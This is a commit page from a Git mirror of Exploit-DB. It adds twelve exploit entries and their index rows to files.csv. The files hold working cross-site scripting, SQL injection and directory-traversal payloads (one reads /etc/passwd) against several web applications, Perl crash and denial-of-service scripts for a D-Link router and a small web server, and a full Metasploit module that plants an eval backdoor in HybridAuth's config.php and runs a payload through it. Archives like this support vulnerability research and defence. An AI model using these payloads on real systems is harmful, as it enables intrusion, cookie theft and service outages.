bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 08_23_2014

Browse source
This commit is contained in:
Offensive Security 2014-08-23 04:40:24 +00:00
parent 059c038e05
commit 414aad7eb0
13 changed files with 415 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

12
files.csv
View file

@ -30971,3 +30971,15 @@ id,file,description,date,author,platform,type,port
34383,platforms/php/webapps/34383.txt,"Social Media 'index.php' Local File Include Vulnerability",2010-07-27,"Harri Johansson",php,webapps,0
34384,platforms/jsp/webapps/34384.txt,"Jira 4.0.1 Cross Site Scripting and Information Disclosure Vulnerabilities",2010-07-28,MaXe,jsp,webapps,0
34385,platforms/linux/remote/34385.txt,"KVIrc <= 4.0 '\r' Carriage Return in DCC Handshake Remote Command Execution Vulnerability",2010-07-28,unic0rn,linux,remote,0
34386,platforms/php/webapps/34386.txt,"Cetera eCommerce Multiple SQL Injection Vulnerabilities",2010-07-28,MustLive,php,webapps,0
34387,platforms/php/webapps/34387.txt,"Cetera eCommerce Multiple Cross Site Scripting and HTML Injection Vulnerabilities",2010-07-28,MustLive,php,webapps,0
34388,platforms/php/webapps/34388.txt,"SPIP 2.1 'var_login' Parameter Cross Site Scripting Vulnerability",2010-07-28,dotsafe.fr,php,webapps,0
34389,platforms/php/webapps/34389.txt,"Impact Software Ad Peeps Cross Site Scripting and HTML Injection Vulnerabilities",2010-07-27,Matt,php,webapps,0
34390,platforms/php/remote/34390.rb,"HybridAuth install.php PHP Code Execution",2014-08-21,metasploit,php,remote,80
34391,platforms/php/webapps/34391.txt,"Sourcefabric Campsite Multiple Cross Site Scripting Vulnerabilities",2010-07-30,"High-Tech Bridge SA",php,webapps,0
34392,platforms/php/webapps/34392.txt,"MyIT CRM 'index.php' Multiple Cross Site Scripting Vulnerabilities",2010-08-02,"Juan Manuel Garcia",php,webapps,0
34393,platforms/php/webapps/34393.txt,"Joomla! 'com_jigsaw' Component 'controller' Parameter Directory Traversal Vulnerability",2010-08-03,FL0RiX,php,webapps,0
34394,platforms/hardware/dos/34394.pl,"D-Link WBR-2310 1.0.4 Web Server HTTP GET Request Remote Buffer Overflow Vulnerability",2010-08-03,"Rodrigo Escobar",hardware,dos,0
34395,platforms/windows/dos/34395.pl,"PMSoftware Simple Web Server 2.1 'From:' Header Processing Remote Denial Of Service Vulnerability",2010-08-03,"Rodrigo Escobar",windows,dos,0
34396,platforms/php/webapps/34396.txt,"FuseTalk 3.2/4.0 Multiple Cross Site Scripting Vulnerabilities",2010-07-03,"Juan Manuel Garcia",php,webapps,0
34397,platforms/asp/webapps/34397.txt,"Activedition 'activedition/aelogin.asp' Multiple Cross Site Scripting Vulnerabilities",2009-09-25,"Richard Brain",asp,webapps,0

Can't render this file because it is too large.

15
platforms/asp/webapps/34397.txt Executable file
View file

@ -0,0 +1,15 @@
source: http://www.securityfocus.com/bid/42164/info
Activedition is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Activedition 4.0 is vulnerable; other versions may also be affected.
http://www.example.com/activedition/aelogin.asp?status=Fail&noreset=True&workflow='"<script><img src="x" onerror='alert(document.cookie)'&liststatus=&area=&pageid=
http://www.example.com/activedition/aelogin.asp?status=Fail&noreset=True&workflow='"<script><img src="http://www.example.com/images/logo_procheckup.gif&liststatus=&area=&pageid=
http://www.example.com/activedition/aelogin.asp?status=Fail&noreset=True&workflow='"<script><iframe%20src="http://www.example.com" width="600%" height="300%"&liststatus=&area=&pageid=
http://www.example.com/activedition/aelogin.asp?status=&noreset=False&workflow=&liststatus=&area=&pageid='"<script><b>User Name<b><BR><input name="user"><BR><b>Password<b><BR><input type = "password" name="pass"><button onClick="">Log in</button

36
platforms/hardware/dos/34394.pl Executable file
View file

@ -0,0 +1,36 @@
source: http://www.securityfocus.com/bid/42153/info
D-Link WBR-2310 is prone to a remote buffer-overflow vulnerability because it fails to bounds-check user-supplied input before copying it into an insufficiently sized memory buffer. This issue occurs in the device's webserver.
Exploiting this vulnerability may allow remote attackers to execute arbitrary code in the context of the affected devices webserver.
D-Link WBR-2310 firmware version 1.04 is vulnerable; other versions may also be affected.
#!/usr/bin/perl
use IO::Socket;
if (@ARGV < 1) {
usage();
}
$ip = $ARGV[0];
$port = $ARGV[1];
print "[+] Sending request...\n";
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr =>
"$ip", PeerPort => "$port") || die "[-] Connection FAILED!\n";
print $socket "GET
/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n";
sleep(3);
close($socket);
print "[+] Done!\n";
sub usage() {
print "[-] Usage: <". $0 ."> <host> <port>\n";
print "[-] Example: ". $0 ." 192.168.0.1 80\n";
exit;
}

138
platforms/php/remote/34390.rb Executable file
View file

@ -0,0 +1,138 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ManualRanking # application config.php is overwritten
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'HybridAuth install.php PHP Code Execution',
'Description' => %q{
This module exploits a PHP code execution vulnerability in
HybridAuth versions 2.0.9 to 2.2.2. The install file 'install.php'
is not removed after installation allowing unauthenticated users to
write PHP code to the application configuration file 'config.php'.
Note: This exploit will overwrite the application configuration file
rendering the application unusable.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Pichaya Morimoto', # Discovery and PoC
'Brendan Coles <bcoles[at]gmail.com>' # Metasploit
],
'References' =>
[
['EDB', '34273'],
['OSVDB','109838']
],
'Arch' => ARCH_PHP,
'Platform' => 'php',
'Targets' =>
[
# Tested:
# HybridAuth versions 2.0.9, 2.0.10, 2.0.11, 2.1.2, 2.2.2 on Apache/2.2.14 (Ubuntu)
['HybridAuth version 2.0.9 to 2.2.2 (PHP Payload)', {}]
],
'Privileged' => false,
'DisclosureDate' => 'Aug 4 2014',
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [true, 'The base path to HybridAuth library', '/hybridauth/'])
], self.class)
end
#
# Check:
# * install.php exists
# * config.php is writable
# * HybridAuth version is 2.0.9 to 2.0.11, 2.1.x, or 2.2.0 to 2.2.2
#
def check
res = send_request_cgi 'uri' => normalize_uri(target_uri.path, 'install.php')
if !res
vprint_error "#{peer} - Connection failed"
return Exploit::CheckCode::Unknown
elsif res.code == 404
vprint_error "#{peer} - Could not find install.php"
elsif res.body =~ />([^<]+)<\/span> must be <b >WRITABLE</
vprint_error "#{peer} - #{$1} is not writable"
elsif res.body =~ />HybridAuth (2\.[012]\.[\d\.]+(-dev)?) Installer</
version = res.body.scan(/>HybridAuth (2\.[012]\.[\d\.]+(-dev)?) Installer</).first.first
vprint_status "#{peer} - Found version: #{version}"
if version =~ /^2\.(0\.(9|10|11)|1\.[\d]+|2\.[012])/
return Exploit::CheckCode::Vulnerable
else
vprint_error "#{peer} - HybridAuth version #{version} is not vulnerable"
end
end
Exploit::CheckCode::Safe
end
#
# Exploit
#
def exploit
# check vuln
if check != Exploit::CheckCode::Vulnerable
fail_with Exploit::Failure::NotVulnerable, "#{peer} - Target is not vulnerable"
end
# write backdoor
print_status "#{peer} - Writing backdoor to config.php"
payload_param = rand(1000)
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'install.php'),
'data' => "OPENID_ADAPTER_STATUS=eval(base64_decode($_POST[#{payload_param}])))));/*"
)
if !res
fail_with Failure::Unknown, "#{peer} - Connection failed"
elsif res.body =~ /Installation completed/
print_good "#{peer} - Wrote backdoor successfully"
else
fail_with Failure::UnexpectedReply, "#{peer} - Coud not write backdoor to 'config.php'"
end
# execute payload
code = Rex::Text.encode_base64(payload.encoded)
print_status "#{peer} - Sending payload to config.php backdoor (#{code.length} bytes)"
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'config.php'),
'data' => "#{payload_param}=#{code}"
}, 5)
if !res
print_warning "#{peer} - No response"
elsif res.code == 404
fail_with Failure::NotFound, "#{peer} - Could not find config.php"
elsif res.code == 200 || res.code == 500
print_good "#{peer} - Sent payload successfully"
end
# remove backdoor
print_status "#{peer} - Removing backdoor from config.php"
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'install.php'),
'data' => 'OPENID_ADAPTER_STATUS='
)
if !res
print_error "#{peer} - Connection failed"
elsif res.body =~ /Installation completed/
print_good "#{peer} - Removed backdoor successfully"
else
print_warning "#{peer} - Could not remove payload from config.php"
end
end
end

12
platforms/php/webapps/34386.txt Executable file
View file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/42058/info
Cetera eCommerce is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues can allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Cetera eCommerce 14.0 and previous versions are vulnerable; other versions may also be affected.
The following example URIs are given:
http://www.example.com/cms/templates/banner.php?bannerId=1%20and%20version()=5
http://www.example.com/cms/templates/bannerlist.php?page=-1

21
platforms/php/webapps/34387.txt Executable file
View file

@ -0,0 +1,21 @@
source: http://www.securityfocus.com/bid/42059/info
Cetera eCommerce is prone to multiple cross-site-scripting and HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
Attacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
Cetera eCommerce version 14.0 is vulnerable; other versions may also be affected.
http://www.example.com/cms/templates/search.php?q=111&sobject=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/cms/templates/bannerlist.php?deleted=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/cms/templates/bannerlist.php?errorMessage=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/cms/templates/banner.php?errorMessage=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/account/?messageES=s9&messageParam[0]=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/cms/index.php?messageES=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/cms/index.php?messageES=s9&messageParam[0]=%3Cscript%3Ealert(document.cookie)%3C/script%3E

9
platforms/php/webapps/34388.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/42060/info
SPIP is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
SPIP version 2.1.0 is vulnerable; other versions may also be affected.
http://www.example.com/spip.php?page=informer_auteur&var_login[a<script>alert('XSS');</script>a]=aaa

18
platforms/php/webapps/34389.txt Executable file
View file

@ -0,0 +1,18 @@
source: http://www.securityfocus.com/bid/42071/info
Impact Software Ad Peeps is prone to multiple cross-site scripting vulnerabilities and multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
Attacker-supplied HTML and script code could run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
Ad Peeps 8.5d1 is vulnerable; other versions may also be affected.
http://www.example.com/adpeeps/index.php?uid="><script>alert(0)</script>
http://www.example.com/adpeeps/index.php?loc=login_lookup&uid="><script>alert(0)</script>
http://www.example.com/adpeeps/index.php?loc=adminlogin&uid="><script>alert(0)</script>
http://www.example.com/adpeeps/index.php?loc=createcampaign&mode=new&uid=100000&c ampaignid="><script>alert(0)</script>
http://www.example.com/adpeeps/index.php?loc=view_account_stats&uid=100000&type=" ><script>alert(2)</script>&period="><script>alert(1)</script>
http://www.example.com/adpeeps/index.php?loc=view_adrates&uid="><script>alert(0)</script>
http://www.example.com/adpeeps/index.php?loc=account_confirmation&accname="><scri pt>alert(1)</script>&loginpass="><script>alert(2)</script>&uid=100000
http://www.example.com/adpeeps/index.php?loc=setup_account&e6=new&e12=bypass&e9=" ><script>alert(0)</script>
http://www.example.com/adpeeps/index.php?loc=email_advertisers&uid=100000&mode=1& errors=&from="><script>alert(1)</script>&message=&subject="><script>alert(2)</script>
http://www.example.com/adpeeps/index.php?loc=edit_ad_package&uid=100000&idno="><s cript>alert(0)</script>

19
platforms/php/webapps/34391.txt Executable file
View file

@ -0,0 +1,19 @@
source: http://www.securityfocus.com/bid/42107/info
Sourcefabric Campsite is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Sourcefabric Campsite 3.3.6 is vulnerable; prior versions may also be affected.
http://www.example.com/admin/system_pref/do_edit.php?f_campsite_online=Y&f_site_title=Kora"><script>alert(document.cookie)</script>&f_site_metakeywords=11&f_site_metadescription=22&f_cache_enabled=N&f_cache_engine=APC&f_imagecache_lifetime=86400&f_secret_key=1&f_session_lifetime=1400&f_keyword_separator=%2C&f_login_num=3&f_max_upload_filesize=16M&f_smtp_www.example.com=localwww.example.com&f_smtp_port=25&f_editor_image_ratio=100&f_external_subs_management=N&f_use_replication=N&f_db_repl_www.example.com=&f_db_repl_user=&f_db_repl_pass=&f_db_repl_port=3306&f_use_campcaster=N&f_cc_www.example.comname=localwww.example.com&f_cc_www.example.comport=80&f_cc_xrpcpath=%2Fcampcaster%2FstorageServer%2Fvar%2Fxmlrpc%2F&f_cc_xrpcfile=xrLocStor.php&f_template_filter=.*%2C+CVS&save=%D0%A1%D0%BE%D1%85%D1%80%D0%B0%D0%BD%D0%B8%D1%82%D1%8C HTTP/1.1
<form action="http://www.example.com/admin/comments/index.php" method="post" name="main" >
<input type="hidden" name="f_comment_per_page" value="20" >
<input type="hidden" name="f_comment_search" value='1"><script>alert(document.cookie)</script>'>
<input type="hidden" name="f_comment_order_by" value="datestamp">
</form>
<script>
document.main.submit();
</script>

52
platforms/php/webapps/34392.txt Executable file
View file

@ -0,0 +1,52 @@
source: http://www.securityfocus.com/bid/42140/info
MyIT CRM is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
MyIT CRM 0.2.8.1 is vulnerable; other versions may also be affected.
Proof of Concept:
http://XXX.XXX.XXX.XXX/index.php?page=employees:main&page_title=View%20Employees
* The parameter 'name' in the POST request has been set to:
>"'><img%20src%3D%26%23x6a;
%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;
%26%23x70;%26%23x74;%26%23x3a;alert(36078)>
POST /?page=employees:main HTTP/1.0
Cookie: PHPSESSID=5460a3d8ab4f72cc624e1a6744f5ecfd
Content-Length: 159
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: demo.myitcrm.com
Content-Type: application/x-www-form-urlencoded
Referer: http://demo.myitcrm.com/index.php?page=employees:main&page_title=View%20Employees
name=>"'><img%20src%3D%26%23x6a;
%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%2
3x70;%26%23x74;%26%23x3a;alert(36078)>&submit=Search
* The parameter 'employee_id' in the GET request has been set to:
>"'><img%20src%3D%26%23x6a;
%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;
%26%23x70;%26%23x74;%26%23x3a;alert(55255)>
GET /?page=employees:employee_details&employee_id=>"'><img%20src%3D%26%23x6a;
%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%2
3x70;%26%23x74;%26%23x3a;alert(55255)> HTTP/1.0
Cookie: PHPSESSID=4b54d326030a5967e44f5719747a7c86
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: demo.myitcrm.com
Referer: http://demo.myitcrm.com/?page=employees:main
* The parameter 'page' in the POST request has been set to:
>%22%27><img%20src%3d%22javascript:alert(35665)%22>
POST /?page=>%22%27><img%20src%3d%22javascript:alert(35665)%22> HTTP/1.0
Cookie: PHPSESSID=b639ec20245375dcf4b1c3f25dfdf20f
Content-Length: 19
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: demo.myitcrm.com
Content-Type: application/x-www-form-urlencoded
Referer: http://demo.myitcrm.com/index.php?page=employees:main&page_title=View%20Employees
name=&submit=Search

7
platforms/php/webapps/34393.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/42144/info
The 'com_jigsaw' component for Joomla! is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.
Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks.
http://www.example.com/index.php?option=com_jigsaw&controller=../../../../../../../etc/passwd%00

16
platforms/php/webapps/34396.txt Executable file
View file

@ -0,0 +1,16 @@
source: http://www.securityfocus.com/bid/42157/info
FuseTalk is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
FuseTalk 4.0 is vulnerable; other versions may also be affected.
http://www.example.com/usersearchresults.cfm?keyword=ttm--"%20><script>alert("TheTestManager.com-
Month of Full disclosure")</script>&FT_ACTION=SearchUsers - (IE8
tested)
or
http://www.example.com/categories.aspx?catid=76&FTVAR_SORT=date&FTVAR_SORTORDER=0017ttm-"
style=x:expression(alert("TheTestManager")) ttm=" (IE7 test)

60
platforms/windows/dos/34395.pl Executable file
View file

@ -0,0 +1,60 @@
source: http://www.securityfocus.com/bid/42155/info
PMSoftware Simple Web Server is prone to a denial-of-service vulnerability.
Remote attackers can exploit this issue to cause the application to stop responding, denying service to legitimate users.
Simple Web Server 2.1 is vulnerable; other versions may also be affected.
#!/usr/bin/perl
use IO::Socket;
$ip = $ARGV[0];
$port = $ARGV[1];
$conn = $ARGV[2];
$num = 0;
while ( $num <= $conn ) {
system("echo -n .");
$s = IO::Socket::INET->new(Proto => "tcp", PeerAddr =>
"$ip", PeerPort => "$port") || die "[-] Connection FAILED!\n";
close($s);
$num++;
}
#!/usr/bin/perl
use Net::HTTP;
if (@ARGV < 1) {
usage();
}
$host = @ARGV[0];
$port = @ARGV[1];
$num = 0;
print "[+] Sending request...\n";
while ($num <= 255) {
my $s = Net::HTTP->new(Host => $host, HTTPVersion => "1.0") || die $@;
$s->write_request(GET => "/", 'User-Agent' => "Mozilla/5.0",
'From' => chr($num));
$num++;
close($s);
}
print "\n[+] Done!\n";
sub usage() {
print "[-] Usage: <". $0 ."> <host> <port>\n";
print "[-] Example: ". $0 ." 127.0.0.1 80\n";
exit;
}